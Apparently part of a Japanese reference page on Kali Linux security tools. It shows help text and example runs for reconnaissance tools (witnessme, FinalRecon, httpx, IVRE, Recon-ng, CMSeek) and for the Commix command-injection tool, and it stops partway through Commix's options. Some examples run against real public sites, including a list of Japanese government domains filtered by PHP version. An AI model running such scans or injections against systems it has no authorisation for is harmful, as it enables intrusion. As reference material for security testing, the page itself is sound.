[witnessme.screenshot] INFO - Took screenshot of http://192.168.11.4:80
[witnessme.headlessbrowser] INFO - Killing headless browser
[witnessme.screenshot] INFO - Saved scan to scan_2024_12_01_070106/
root@kali:~# witnessme grab http://192.168.11.4
[witnessme.headlessbrowser] INFO - Starting headless browser
[witnessme.headlessbrowser] WARNING - Running under root privileges, browser will start with --no-sandbox
[witnessme.headlessbrowser] INFO - Using 1 browser tab(s)/thread(s)
[witnessme.grab] INFO - Grabbed page:
{
"body": "74847 bytes",
"headers": {
"cache-control": "max-age=0, must-revalidate, private",
"connection": "Keep-Alive",
"content-encoding": "gzip",
"content-type": "text/html; charset=UTF-8",
"date": "Sun, 01 Dec 2024 07:03:32 GMT",
"expires": "Sun, 01 Dec 2024 07:03:32 GMT",
"keep-alive": "timeout=5, max=100",
"server": "Apache/2.4.62 (Debian)",
"set-cookie": "maintenance_token=deleted; expires=Sat, 02 Dec 2023 07:03:31 GMT; Max-Age=0; path=/; httponly\neccube=khjfkis6uuhmvr3dbv0j83tb2a; path=/; httponly",
"transfer-encoding": "chunked",
"vary": "Accept-Encoding",
"x-content-type-options": "nosniff",
"x-debug-token": "5ace25",
"x-debug-token-link": "http://192.168.11.4/_profiler/5ace25",
"x-frame-options": "SAMEORIGIN",
"x-powered-by": "PHP/8.1.31",
"x-robots-tag": "noindex",
"x-xss-protection": "1; mode=block"
},
"ip": "192.168.11.4",
"port": 80,
"scheme": "http",
"server": "Apache/2.4.62 (Debian)",
"title": "EC-CUBE SHOP / TOP\u30da\u30fc\u30b8",
"url": "http://192.168.11.4:80"
}
[witnessme.headlessbrowser] INFO - Killing headless browser
root@kali:~# wmdb scan_2024_12_01_070106/
[!] Press tab for autocompletion and available commands
WMDB >> servers
+----+------------------------+--------------------------+------------------------+----------------------+
| Id | URL | Title | Server | Matched Signature(s) |
+----+------------------------+--------------------------+------------------------+----------------------+
| 1 | http://192.168.11.4:80 | EC-CUBE SHOP / TOPページ | Apache/2.4.62 (Debian) | None |
+----+------------------------+--------------------------+------------------------+----------------------+
Multi-purpose Toolkit
FinalRecon
標的となるWebサイトのヘッダー情報の取得、WHOIS情報の取得、SSL証明書情報の取得、DNS情報の取得、サブドメインの探索、ディレクトリの探索、ポートスキャンなど包括的な機能を提供します。
■ 使用方法
root@kali:~# finalrecon --help
usage: finalrecon [-h] [--url URL] [--headers] [--sslinfo] [--whois] [--crawl] [--dns] [--sub] [--dir] [--wayback] [--ps] [--full] [-nb]
[-dt DT] [-pt PT] [-T T] [-w W] [-r] [-s] [-sp SP] [-d D] [-e E] [-o O] [-cd CD] [-k K]
options:
-h, --help show this help message and exit
--url URL Target URL
--headers Header Information
--sslinfo SSL Certificate Information
--whois Whois Lookup
--crawl Crawl Target
--dns DNS Enumeration
--sub Sub-Domain Enumeration
--dir Directory Search
--wayback Wayback URLs
--ps Fast Port Scan
--full Full Recon
Extra Options:
-nb Hide Banner
-dt DT Number of threads for directory enum [ Default : 30 ]
-pt PT Number of threads for port scan [ Default : 50 ]
-T T Request Timeout [ Default : 30.0 ]
-w W Path to Wordlist [ Default : wordlists/dirb_common.txt ]
-r Allow Redirect [ Default : False ]
-s Toggle SSL Verification [ Default : True ]
-sp SP Specify SSL Port [ Default : 443 ]
-d D Custom DNS Servers [ Default : 1.1.1.1 ]
-e E File Extensions [ Example : txt, xml, php ]
-o O Export Format [ Default : txt ]
-cd CD Change export directory [ Default : ~/.local/share/finalrecon ]
-k K Add API key [ Example : shodan@key ]
■ 使用例
root@kali:~# finalrecon --headers --url https://x.com
[...]
[!] Headers :
date : Sat, 05 Oct 2024 03:11:41 GMT
perf : 7402827104
expiry : Tue, 31 Mar 1981 05:00:00 GMT
pragma : no-cache
server : tsa_m
set-cookie : guest_id_marketing=v1%3A172809790174216025; Max-Age=63072000; Expires=Mon, 05 Oct 2026 03:11:41 GMT; Path=/; Domain=.x.com; Secure; SameSite=None, guest_id_ads=v1%3A172809790174216025; Max-Age=63072000; Expires=Mon, 05 Oct 2026 03:11:41 GMT; Path=/; Domain=.x.com; Secure; SameSite=None, personalization_id="v1_mWycO5XfwlN/98rX98j7OA=="; Max-Age=63072000; Expires=Mon, 05 Oct 2026 03:11:41 GMT; Path=/; Domain=.x.com; Secure; SameSite=None, guest_id=v1%3A172809790174216025; Max-Age=63072000; Expires=Mon, 05 Oct 2026 03:11:41 GMT; Path=/; Domain=.x.com; Secure; SameSite=None, ct0=; Max-Age=-1728097900; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; Domain=.x.com; Secure; SameSite=Lax
content-type : text/html; charset=utf-8
x-powered-by : Express
cache-control : no-store, max-age=0
last-modified : Sat, 05 Oct 2024 03:11:41 GMT
x-frame-options : DENY
x-transaction-id : 2e77ad93f7dd92be
x-xss-protection : 0
x-content-type-options : nosniff
content-security-policy : connect-src 'self' blob: https://*.pscp.tv https://*.twimg.com https://*.video.pscp.tv https://aa.twitter.com https://aa.x.com https://accounts.google.com/gsi/ https://ads-api.twitter.com https://ads-api.x.com https://api-stream.twitter.com https://api-stream.x.com https://api.twitter.com https://api.x.ai https://api.x.com https://api.x.com https://caps.twitter.com https://caps.x.com https://jf.twitter.com https://jf.x.com https://pay.twitter.com https://pay.x.com https://production.plaid.com/ https://sandbox.plaid.com/ https://sentry.io https://ton-staging.atla.twitter.com https://ton-staging.atla.x.com https://ton-staging.pdxa.twitter.com https://ton-staging.pdxa.x.com https://ton.twitter.com https://ton.x.com https://twitter.com https://upload.twitter.com https://upload.x.com https://www.google-analytics.com https://x.com https://checkoutshopper-live.adyen.com wss://*.pscp.tv https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net https://media.riffsy.com https://*.giphy.com https://media.tenor.com https://c.tenor.com ws://localhost:8008/v2/ipc http://127.0.0.1:7346 http://127.0.0.1:9001 http://localhost:9013 https://ads-twitter.com https://analytics.twitter.com https://analytics.x.com ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com https://x.com https://*.x.com https://localhost.twitter.com:3443 https://localhost.x.com:3443; font-src 'self' https://*.twimg.com; frame-src 'self' https://accounts.google.com/ https://accounts.google.com/gsi/ https://api.sandbox.sardine.ai/ https://cards-frame.twitter.com https://cdn.plaid.com/ https://client-api.arkoselabs.com/ https://content.googleapis.com/ https://iframe.arkoselabs.com/ https://mobile.twitter.com https://mobile.x.com https://pay.twitter.com https://pay.x.com https://payments-dev.x.com/ https://payments-staging.x.com/ https://payments-prod.x.com/ https://twitter.com https://vaultjs.apideck.com/ https://verify-sandbox.plaid.com/ https://x.com https://recaptcha.net/recaptcha/ https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/; img-src 'self' blob: data: https://*.cdn.twitter.com https://*.cdn.x.com https://ton.twitter.com https://ton.x.com https://*.twimg.com https://analytics.twitter.com https://analytics.x.com https://cm.g.doubleclick.net https://www.google-analytics.com https://maps.googleapis.com https://www.periscope.tv https://www.pscp.tv https://ads-twitter.com https://ads-api.twitter.com https://ads-api.x.com https://media.riffsy.com https://*.giphy.com https://media.tenor.com https://c.tenor.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://scontent-sea1-1.xx.fbcdn.net https://*.googleusercontent.com https://t.co/1/i/adsct; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://x.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://recaptcha.net/recaptcha/ https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ http://www.gstatic.com/cast/sdk/libs/caf_receiver/v3/cast_receiver_framework.js https://accounts.google.com/gsi/client https://api.sandbox.sardine.ai/assets/loader.min.js https://apis.google.com/js/api.js https://appleid.cdn-apple.com/appleauth/static/jsapi/appleid/1/en_US/appleid.auth.js https://cdn.plaid.com/link/v2/stable/link-initialize.js https://client-api.arkoselabs.com/ https://static.ads-twitter.com https://twitter.com https://www.google-analytics.com https://www.gstatic.com/cast/sdk/libs/caf_receiver/v3/cast_receiver_framework.js https://x.com http://localhost:12345/scfs/cl/js/vizio-companion-lib.js 'wasm-unsafe-eval' 'nonce-MjhlMDRlMGEtNjU3Zi00YWU3LTk5ZTQtZmZkN2RhMTkwNDM3'; style-src 'self' 'unsafe-inline' https://accounts.google.com/gsi/style https://*.twimg.com; worker-src 'self' blob:; report-uri https://x.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false
strict-transport-security : max-age=631138519
cross-origin-opener-policy : unsafe-none
cross-origin-embedder-policy : unsafe-none
content-encoding : gzip
x-response-time : 105
x-connection-hash : 1ea410203591d1d495464746b92645b073bb6f149eb19f05b6c4bccbaf4f1ea2
transfer-encoding : chunked
root@kali:~# finalrecon --dns --url https://x.com
[...]
[!] Starting DNS Enumeration...
A : 104.244.42.193
A : 104.244.42.1
A : 104.244.42.129
A : 104.244.42.65
MX : 5 alt1.aspmx.l.google.com.
MX : 5 alt2.aspmx.l.google.com.
MX : 10 alt3.aspmx.l.google.com.
MX : 1 aspmx.l.google.com.
MX : 10 alt4.aspmx.l.google.com.
NS : d.u10.twtrdns.net.
NS : b.r10.twtrdns.net.
NS : b.u10.twtrdns.net.
NS : a.r10.twtrdns.net.
NS : c.u10.twtrdns.net.
NS : d.r10.twtrdns.net.
NS : a.u10.twtrdns.net.
NS : c.r10.twtrdns.net.
SOA : a.u10.twtrdns.net. noc.twitter.com. 2023138457 3600 600 604800 300
TXT : "kkdl3qb3tcrmdhfsm803p67r0my0svs8"
TXT : "slack-domain-verification=Csk4bjCPFnJaDLLaKFUwCTFuUpCVvnYlAm2Tba0i"
TXT : "atlassian-sending-domain-verification=bd424180-8645-4de5-bd6a-285479c7577a"
TXT : "google-site-verification=F6u9mGL--d2lbLljvH3b1UUgXtevQPdcamKr9c8914A"
TXT : "_w548xs1kfxtlqk3jyx19bzwk34c473i"
TXT : "adobe-idp-site-verification=ab4d9ce3473a73e81f46238da34ea4967fd5ac80e5c43fbfa8dff46d06a5321c"
TXT : "atlassian-domain-verification=j6u0o1PTkobCXC84uEF/sWpIPtaZURBVYqKzmTvT8wugLcHT1vvrzzA63iP1qSLN"
TXT : "google-site-verification=8yQmoVhQedzlt36RPeQP41ytrEFk9aHEnde_xm0626g"
TXT : "3089463"
TXT : "adobe-sign-verification=c693a744ee2d282a36a43e6e724c5ea"
TXT : "apple-domain-verification=sEij6tJOW11fVNrG"
TXT : "v=spf1 ip4:199.16.156.128/26 ip4:199.59.150.64/26 include:_spf.google.com include:_spf.salesforce.com include:_oerp.x.com -all"
DMARC : "v=DMARC1; p=reject; rua=mailto:caf935f12c8645b2921b0749d1fcd49e@dmarc-reports.cloudflare.net"
httpx
複数のスキャンを実行できる多目的のHTTPツールキットです。
■ 使用方法
root@kali:~# httpx --help
Usage:
httpx [flags]
Flags:
INPUT:
-l, -list string input file containing list of hosts to process
-rr, -request string file containing raw request
-u, -target string[] input target host(s) to probe
PROBES:
-sc, -status-code display response status-code
-cl, -content-length display response content-length
-ct, -content-type display response content-type
-location display response redirect location
-favicon display mmh3 hash for '/favicon.ico' file
-hash string display response body hash (supported: md5,mmh3,simhash,sha1,sha256,sha512)
-jarm display jarm fingerprint hash
-rt, -response-time display response time
-lc, -line-count display response body line count
-wc, -word-count display response body word count
-title display page title
-bp, -body-preview display first N characters of response body (default 100)
-server, -web-server display server name
-td, -tech-detect display technology in use based on wappalyzer dataset
-method display http request method
-websocket display server using websocket
-ip display host ip
-cname display host cname
-extract-fqdn, -efqdn get domain and subdomains from response body and header in jsonl/csv output
-asn display host asn information
-cdn display cdn/waf in use (default true)
-probe display probe status
HEADLESS:
-ss, -screenshot enable saving screenshot of the page using headless browser
-system-chrome enable using local installed chrome for screenshot
-ho, -headless-options string[] start headless chrome with additional options
-esb, -exclude-screenshot-bytes enable excluding screenshot bytes from json output
-ehb, -exclude-headless-body enable excluding headless header from json output
-st, -screenshot-timeout int set timeout for screenshot in seconds (default 10)
MATCHERS:
-mc, -match-code string match response with specified status code (-mc 200,302)
-ml, -match-length string match response with specified content length (-ml 100,102)
-mlc, -match-line-count string match response body with specified line count (-mlc 423,532)
-mwc, -match-word-count string match response body with specified word count (-mwc 43,55)
-mfc, -match-favicon string[] match response with specified favicon hash (-mfc 1494302000)
-ms, -match-string string[] match response with specified string (-ms admin)
-mr, -match-regex string[] match response with specified regex (-mr admin)
-mcdn, -match-cdn string[] match host with specified cdn provider (cloudfront, fastly, google)
-mrt, -match-response-time string match response with specified response time in seconds (-mrt '< 1')
-mdc, -match-condition string match response with dsl expression condition
EXTRACTOR:
-er, -extract-regex string[] display response content with matched regex
-ep, -extract-preset string[] display response content matched by a pre-defined regex (mail,url,ipv4)
FILTERS:
-fc, -filter-code string filter response with specified status code (-fc 403,401)
-fep, -filter-error-page filter response with ML based error page detection
-fl, -filter-length string filter response with specified content length (-fl 23,33)
-flc, -filter-line-count string filter response body with specified line count (-flc 423,532)
-fwc, -filter-word-count string filter response body with specified word count (-fwc 423,532)
-ffc, -filter-favicon string[] filter response with specified favicon hash (-ffc 1494302000)
-fs, -filter-string string[] filter response with specified string (-fs admin)
-fe, -filter-regex string[] filter response with specified regex (-fe admin)
-fcdn, -filter-cdn string[] filter host with specified cdn provider (cloudfront, fastly, google)
-frt, -filter-response-time string filter response with specified response time in seconds (-frt '> 1')
-fdc, -filter-condition string filter response with dsl expression condition
-strip strips all tags in response. supported formats: html,xml (default html)
RATE-LIMIT:
-t, -threads int number of threads to use (default 50)
-rl, -rate-limit int maximum requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute
MISCELLANEOUS:
-pa, -probe-all-ips probe all the ips associated with same host
-p, -ports string[] ports to probe (nmap syntax: eg http:1,2-10,11,https:80)
-path string path or list of paths to probe (comma-separated, file)
-tls-probe send http probes on the extracted TLS domains (dns_name)
-csp-probe send http probes on the extracted CSP domains
-tls-grab perform TLS(SSL) data grabbing
-pipeline probe and display server supporting HTTP1.1 pipeline
-http2 probe and display server supporting HTTP2
-vhost probe and display server supporting VHOST
-ldv, -list-dsl-variables list json output field keys name that support dsl matcher/filter
UPDATE:
-up, -update update httpx to latest version
-duc, -disable-update-check disable automatic httpx update check
OUTPUT:
-o, -output string file to write output results
-oa, -output-all filename to write output results in all formats
-sr, -store-response store http response to output directory
-srd, -store-response-dir string store http response to custom directory
-ob, -omit-body omit response body in output
-csv store output in csv format
-csvo, -csv-output-encoding string define output encoding
-j, -json store output in JSONL(ines) format
-irh, -include-response-header include http response (headers) in JSON output (-json only)
-irr, -include-response include http request/response (headers + body) in JSON output (-json only)
-irrb, -include-response-base64 include base64 encoded http request/response in JSON output (-json only)
-include-chain include redirect http chain in JSON output (-json only)
-store-chain include http redirect chain in responses (-sr only)
-svrc, -store-vision-recon-cluster include visual recon clusters (-ss and -sr only)
-pr, -protocol string protocol to use (unknown, http11)
-fepp, -filter-error-page-path string path to store filtered error pages (default "filtered_error_page.json")
CONFIGURATIONS:
-config string path to the httpx configuration file (default $HOME/.config/httpx/config.yaml)
-r, -resolvers string[] list of custom resolver (file or comma separated)
-allow string[] allowed list of IP/CIDR\'s to process (file or comma separated)
-deny string[] denied list of IP/CIDR\'s to process (file or comma separated)
-sni, -sni-name string custom TLS SNI name
-random-agent enable Random User-Agent to use (default true)
-H, -header string[] custom http headers to send with request
-http-proxy, -proxy string http proxy to use (eg http://127.0.0.1:8080)
-unsafe send raw requests skipping golang normalization
-resume resume scan using resume.cfg
-fr, -follow-redirects follow http redirects
-maxr, -max-redirects int max number of redirects to follow per host (default 10)
-fhr, -follow-host-redirects follow redirects on the same host
-rhsts, -respect-hsts respect HSTS response headers for redirect requests
-vhost-input get a list of vhosts as input
-x string request methods to probe, use 'all' to probe all HTTP methods
-body string post body to include in http request
-s, -stream stream mode - start elaborating input targets without sorting
-sd, -skip-dedupe disable dedupe input items (only used with stream mode)
-ldp, -leave-default-ports leave default http/https ports in host header (eg. http://host:80 - https://host:443
-ztls use ztls library with autofallback to standard one for tls13
-no-decode avoid decoding body
-tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization
-no-stdin Disable Stdin processing
-hae, -http-api-endpoint string experimental http api endpoint
DEBUG:
-health-check, -hc run diagnostic check up
-debug display request/response content in cli
-debug-req display request content in cli
-debug-resp display response content in cli
-version display httpx version
-stats display scan statistic
-profile-mem string optional httpx memory profile dump file
-silent silent mode
-v, -verbose verbose mode
-si, -stats-interval int number of seconds to wait between showing a statistics update (default: 5)
-nc, -no-color disable colors in cli output
OPTIMIZATIONS:
-nf, -no-fallback display both probed protocol (HTTPS and HTTP)
-nfs, -no-fallback-scheme probe with protocol scheme specified in input
-maxhr, -max-host-error int max error count per host before skipping remaining path/s (default 30)
-e, -exclude string[] exclude host matching specified filter ('cdn', 'private-ips', cidr, ip, regex)
-retries int number of retries
-timeout int timeout in seconds (default 10)
-delay value duration between each http request (eg: 200ms, 1s) (default -1ns)
-rsts, -response-size-to-save int max response size to save in bytes (default 2147483647)
-rstr, -response-size-to-read int max response size to read in bytes (default 2147483647)
CLOUD:
-auth configure projectdiscovery cloud (pdcp) api key (default true)
-pd, -dashboard upload / view output in projectdiscovery cloud (pdcp) UI dashboard
-aid, -asset-id string upload new assets to existing asset id (optional)
-aname, -asset-name string assets group name to set (optional)
-pdu, -dashboard-upload string upload httpx output file (jsonl) in projectdiscovery cloud (pdcp) UI dashboard
■ 使用例
# wappalyzerのデータセットを用いて使用している技術スタックを解析する
root@kali:~# httpx -u qiita.com -tech-detect
https://qiita.com [Amazon CloudFront,Amazon Web Services,DoubleClick for Publishers (DFP),Google Publisher Tag,HSTS,Nginx,Ruby,Ruby on Rails]
# ドメインリストの中から技術スタックにPHPが含まれるサイトを抽出する
root@kali:~# cat gov-domains.txt | httpx -silent -json | jq -c 'select(.tech[] | contains("PHP")) | {url: .url, tech: .tech}' | anew
{"url":"https://carbon-markets.go.jp","tech":["Apache HTTP Server:2.4.6","Bootstrap","CentOS","OpenSSL:1.0.2k","PHP:7.2.34"]}
{"url":"https://cals-ed.go.jp","tech":["Apache HTTP Server","MySQL","PHP","WordPress"]}
{"url":"https://cio.go.jp","tech":["Amazon CloudFront","Amazon S3","Amazon Web Services","Bootstrap:3.2.0","Cloudflare","Drupal","FlexSlider","Google Hosted Libraries","Material Design Lite","Modernizr","PHP","cdnjs","jQuery"]}
{"url":"https://chizai-kinyu.go.jp","tech":["Google Analytics","Google Tag Manager","MySQL","Nginx","PHP","WordPress","jQuery"]}
{"url":"https://amami.go.jp","tech":["Apache HTTP Server","MySQL","PHP:8.1.29","WordPress"]}
[...]
# ドメインリストの中からページが存在するサイトのスクリーンショットを取得する
root@kali:~# cat domains.txt | httpx -silent -mc 200,301,302 -ss
https://google.co.jp
https://yahoo.co.jp
IVRE
ネットワーク偵察フレームワークです。パッシブDNSサービスを実行したり、独自のEASMツールを構築したり、ネットワーク・インテリジェンスを収集・分析したりすることができます。
■ 使用方法
root@kali:~# ivre help
usage: ivre [COMMAND]
available commands:
airodump2db
arp2db
auditdom
db2view
flow2db
flowcli
getmoduli
getwebdata
httpd
ipcalc
ipdata
iphost
ipinfo
localscan
macdata
macinfo
p0f2db
passiverecon2db
passivereconworker
plotdb
runscans
runscansagent
runscansagentdb
scan2db
scancli
scanstatus
sort
version
view
weblog2db
zeek2db
Try ivre help [COMMAND]
■ 使用例
# ターゲットに対してサービスのスキャンを実行
root@kali:~# ivre runscans --categories TEST_SCAN --range 192.168.11.4 192.168.11.4 --output XMLFork
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-19 03:23 UTC
[...]
Discovered open port 21/tcp on 192.168.11.4
Discovered open port 25/tcp on 192.168.11.4
Discovered open port 5900/tcp on 192.168.11.4
Discovered open port 445/tcp on 192.168.11.4
Discovered open port 139/tcp on 192.168.11.4
Discovered open port 22/tcp on 192.168.11.4
Discovered open port 80/tcp on 192.168.11.4
Discovered open port 3306/tcp on 192.168.11.4
Discovered open port 23/tcp on 192.168.11.4
Discovered open port 111/tcp on 192.168.11.4
Discovered open port 8009/tcp on 192.168.11.4
Discovered open port 513/tcp on 192.168.11.4
Discovered open port 1099/tcp on 192.168.11.4
Discovered open port 2121/tcp on 192.168.11.4
Discovered open port 5432/tcp on 192.168.11.4
Discovered open port 8180/tcp on 192.168.11.4
Discovered open port 6667/tcp on 192.168.11.4
Discovered open port 514/tcp on 192.168.11.4
Discovered open port 512/tcp on 192.168.11.4
Discovered open port 1524/tcp on 192.168.11.4
Discovered open port 6000/tcp on 192.168.11.4
Completed SYN Stealth Scan at 03:23, 0.08s elapsed (1000 total ports)
Initiating Service scan at 03:23
Scanning 21 services on server4test.mynet (192.168.11.4)
[...]
# スキャン結果をDBに取り込み
root@kali:~# ivre scan2db --categories TEST_SCAN-001 --source MySource --recursive scans/TEST_SCAN/up/
# DBに取り込んだnmapのスキャン結果をもとにビューを作成
root@kali:~# ivre db2view nmap
# 組み込みのWebサーバーを起動
root@kali:~# ivre httpd
ブラウザからスキャン結果を確認
Recon-ng
偵察を行うための多彩な機能を提供する偵察フレームワークです。
■ 使用方法
root@kali:~# recon-ng --help
usage: recon-ng [-h] [-w workspace] [-r filename] [--no-version] [--no-analytics] [--no-marketplace] [--stealth] [--accessible] [--version]
recon-ng - Tim Tomes (@lanmaster53)
options:
-h, --help show this help message and exit
-w workspace load/create a workspace
-r filename load commands from a resource file
--no-version disable version check. Already disabled by default in Debian
--no-analytics disable analytics reporting. Already disabled by default in Debian
--no-marketplace disable remote module management
--stealth disable all passive requests (--no-*)
--accessible Use accessible outputs when available
--version displays the current version
■ 使用例
root@kali:~# recon-ng
[...]
[*] No modules enabled/installed.
# インストール可能なモジュールの一覧を表示
[recon-ng][default] > marketplace info all
+------------------------------------------------------------------------------------+
| path | discovery/info_disclosure/cache_snoop |
| name | DNS Cache Snooper |
| author | thrapt (thrapt@gmail.com) |
| version | 1.1 |
| last_updated | 2020-10-13 |
| description | Uses the DNS cache snooping technique to check for visited domains |
| required_keys | [] |
| dependencies | [] |
| files | ['av_domains.lst'] |
| status | not installed |
+------------------------------------------------------------------------------------+
[...]
# モジュールをインストール
[recon-ng][default] > marketplace install recon/domains-hosts/google_site_web
[*] Module installed: recon/domains-hosts/google_site_web
[*] Reloading modules...
# インストールしたモジュールを読み込み
[recon-ng][default] > modules load recon/domains-hosts/google_site_web
# モジュールのオプションを表示
[recon-ng][default][google_site_web] > options
Manages the current context options
Usage: options <list|set|unset> [...]
[recon-ng][default][google_site_web] > options list
Name Current Value Required Description
------ ------------- -------- -----------
SOURCE default yes source of input (see 'info' for details)
# オプションをセット
[recon-ng][default][google_site_web] > options set SOURCE qiita.com
SOURCE => qiita.com
# モジュールを実行
[recon-ng][default][google_site_web] > run
---------
QIITA.COM
---------
[*] Searching Google for: site:qiita.com
[*] Country: None
[*] Host: zine.qiita.com
[*] Ip_Address: None
[*] Latitude: None
[*] Longitude: None
[*] Notes: None
[*] Region: None
[*] --------------------------------------------------
[*] Country: None
[*] Host: corp.qiita.com
[*] Ip_Address: None
[*] Latitude: None
[*] Longitude: None
[*] Notes: None
[*] Region: None
[*] --------------------------------------------------
[...]
-------
SUMMARY
-------
[*] 7 total (7 new) hosts found.
# 実行結果を照会
[recon-ng][default][google_site_web] > db query select * from hosts where module = 'google_site_web'
+----------------------------------------------------------------------------------------------------+
| host | ip_address | region | country | latitude | longitude | notes | module |
+----------------------------------------------------------------------------------------------------+
| zine.qiita.com | | | | | | | google_site_web |
| corp.qiita.com | | | | | | | google_site_web |
| blog.qiita.com | | | | | | | google_site_web |
| teams.qiita.com | | | | | | | google_site_web |
| help.qiita.com | | | | | | | google_site_web |
| dalab.qiita.com | | | | | | | google_site_web |
| grooves.qiita.com | | | | | | | google_site_web |
+----------------------------------------------------------------------------------------------------+
[*] 7 rows returned
Exploitation and Vulnerability Analysis Tools
Vulnerability Scanning and Exploit
CMSeek
サイトが使用しているCMSの種類を特定します。
■ 使用方法
root@kali:~# cmseek --help
USAGE:
python3 cmseek.py (for guided scanning) OR
python3 cmseek.py [OPTIONS] <Target Specification>
SPECIFING TARGET:
-u URL, --url URL Target Url
-l LIST, --list LIST Path of the file containing list of sites
for multi-site scan (comma separated)
MANIPULATING SCAN:
-i cms, --ignore--cms cms Specify which CMS IDs to skip in order to
avoid flase positive. separated by comma ","
--strict-cms cms Checks target against a list of provided
CMS IDs. separated by comma ","
--skip-scanned Skips target if it\'s CMS was previously detected.
--light-scan Skips Deep Scan. Does CMS and version detection only.
-o, --only-cms Only detect CMS, ignore deep scan and version detection.
RE-DIRECT:
--follow-redirect Follows all/any redirect(s)
--no-redirect Skips all redirects and tests the input target(s)
USER AGENT:
-r, --random-agent Use a random user agent
--googlebot Use Google bot user agent
--user-agent USER_AGENT Specify a custom user agent
OUTPUT:
-v, --verbose Increase output verbosity
VERSION:
--version Show CMSeeK version and exit
HELP & MISCELLANEOUS:
-h, --help Show this help message and exit
--clear-result Delete all the scan result
--batch Never ask you to press enter after every site in a list is scanned
■ 使用例
root@kali:~# cmseek -u http://192.168.11.4/
┏━Target: 192.168.11.4
┃
┠── CMS: EC-CUBE
┃ │
┃ ╰── URL: https://www.ec-cube.net/
┃
┠── Result: /usr/share/cmseek/Result/192.168.11.4/cms.json
┃
┗━Scan Completed in 2.57 Seconds, using 1 Requests
Commix
Webアプリケーションに対してOSコマンドインジェクションの様々なペイロードを実行します。
■ 使用方法
root@kali:~# commix --help
Usage: commix [option(s)]
Options:
-h, --help Show help and exit.
General:
These options relate to general matters.
-v VERBOSE Verbosity level (0-4, Default: 0).
--version Show version number and exit.
--output-dir=OUT.. Set custom output directory path.
-s SESSION_FILE Load session from a stored (.sqlite) file.
--flush-session Flush session files for current target.
--ignore-session Ignore results stored in session file.
-t TRAFFIC_FILE Log all HTTP traffic into a textual file.
--batch Never ask for user input, use the default behaviour.
--skip-heuristics Skip heuristic detection for code injection.
--codec=CODEC Force codec for character encoding (e.g. 'ascii').
--charset=CHARSET Time-related injection charset (e.g.
"0123456789abcdef")
--check-internet Check internet connection before assessing the target.
--answers=ANSWERS Set predefined answers (e.g. "quit=N,follow=N")
Target:
This options has to be provided, to define the target URL.
-u URL, --url=URL Target URL.
--url-reload Reload target URL after command execution.
-l LOGFILE Parse target from HTTP proxy log file.
-m BULKFILE Scan multiple targets given in a textual file.
-r REQUESTFILE Load HTTP request from a file.
--crawl=CRAWLDEPTH Crawl the website starting from the target URL
(Default: 1).
--crawl-exclude=.. Regexp to exclude pages from crawling (e.g. "logout").
-x SITEMAP_URL Parse target(s) from remote sitemap(.xml) file.
--method=METHOD Force usage of given HTTP method (e.g. PUT)
Request:
These options can be used to specify how to connect to the target URL.
-d DATA, --data=.. Data string to be sent through POST.
--host=HOST HTTP Host header.
--referer=REFERER HTTP Referer header.
--user-agent=AGENT HTTP User-Agent header.
--random-agent Use a randomly selected HTTP User-Agent header.
--param-del=PDEL Set character for splitting parameter values.
--cookie=COOKIE HTTP Cookie header.
--cookie-del=CDEL Set character for splitting cookie values.
-H HEADER, --hea.. Extra header (e.g. 'X-Forwarded-For: 127.0.0.1').
--headers=HEADERS Extra headers (e.g. 'Accept-Language: fr\nETag: 123').
--proxy=PROXY Use a proxy to connect to the target URL.
--tor Use the Tor network.
--tor-port=TOR_P.. Set Tor proxy port (Default: 8118).
--tor-check Check to see if Tor is used properly.
--auth-url=AUTH_.. Login panel URL.
--auth-data=AUTH.. Login parameters and data.
--auth-type=AUTH.. HTTP authentication type (Basic, Digest, Bearer).
--auth-cred=AUTH.. HTTP authentication credentials (e.g. 'admin:admin').
--ignore-code=IG.. Ignore (problematic) HTTP error code (e.g. 401).
--force-ssl Force usage of SSL/HTTPS.
--ignore-proxy Ignore system default proxy settings.
--ignore-redirects Ignore redirection attempts.
--timeout=TIMEOUT Seconds to wait before timeout connection (Default:
30).
--retries=RETRIES Retries when the connection timeouts (Default: 3).
--drop-set-cookie Ignore Set-Cookie header from response.
Enumeration:
These options can be used to enumerate the target host.
--all Retrieve everything.
--current-user Retrieve current user name.
--hostname Retrieve current hostname.
--is-root Check if the current user have root privileges.
--is-admin Check if the current user have admin privileges.
--sys-info Retrieve system information.
--users Retrieve system users.
--passwords Retrieve system users password hashes.
--privileges Retrieve system users privileges.
--ps-version Retrieve PowerShell\'s version number.
File access:
These options can be used to access files on the target host.
--file-read=FILE.. Read a file from the target host.
--file-write=FIL.. Write to a file on the target host.
--file-upload=FI.. Upload a file on the target host.
--file-dest=FILE.. Host\'s absolute filepath to write and/or upload to.
Modules:
These options can be used increase the detection and/or injection
capabilities.
--shellshock The 'shellshock' injection module.
Injection:
These options can be used to specify which parameters to inject and to
provide custom injection payloads.
